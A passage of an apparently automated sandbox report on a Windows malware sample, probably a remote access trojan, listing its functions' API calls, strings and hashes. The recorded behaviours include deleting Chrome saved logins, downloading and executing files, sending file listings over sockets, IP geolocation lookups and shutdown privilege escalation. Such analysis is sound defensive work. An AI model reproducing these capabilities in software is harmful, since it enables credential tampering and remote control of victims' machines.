                                    • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                    • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                    Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                      • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                      • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                      • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                      • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                    • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                    • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                    • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                    Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B448
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                    • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                    • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                    • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                    Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                    • GetLastError.KERNEL32 ref: 0040BA93
                                    Strings
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                    • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                    • UserProfile, xrefs: 0040BA59
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                    • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                    • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                    • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                    Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                    • GetLastError.KERNEL32 ref: 004179D8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                    • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                    • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                    • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                    Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409293
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                    • FindClose.KERNEL32(00000000), ref: 004093FC
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095F4
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                    • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                    • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                    • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                    Function 00446270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 464COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: FSE$FSE$PkGNG
                                    • API String ID: 0-1266307253
                                    • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                    • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                    • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                    • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                    Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                    • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                    • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                    Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                      • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                      • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                    • ExitProcess.KERNEL32 ref: 0040F905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 5.1.3 Pro$override$pth_unenc
                                    • API String ID: 2281282204-1392497409
                                    • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                    • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                    • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                    • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                    Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                    • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP
                                    • API String ID: 2299586839-711371036
                                    • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                    • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                    • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                    • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                    Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                    • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                    • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                    • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                    • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                    • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                    Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004096A5
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                    • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                    • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                    • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                    Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040884C
                                    • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                    • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                    • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                    • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                    Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$open
                                    • API String ID: 2825088817-80687600
                                    • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                    • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                    • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                    • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                    Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                    • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                    • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                    • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                    Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                      • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                      • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                      • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                    • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                    • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                    • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                    Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                    • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                    • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                    • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                    • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                    • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                    Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID: p'E$JD
                                    • API String ID: 1084509184-908320845
                                    • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                    • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                    • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                    • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                    Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                      • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                      • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                      • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                    • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                    • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                    • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                    Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                    • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                    • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                    • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                    Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                    Download Yara Rule
                                    APIs
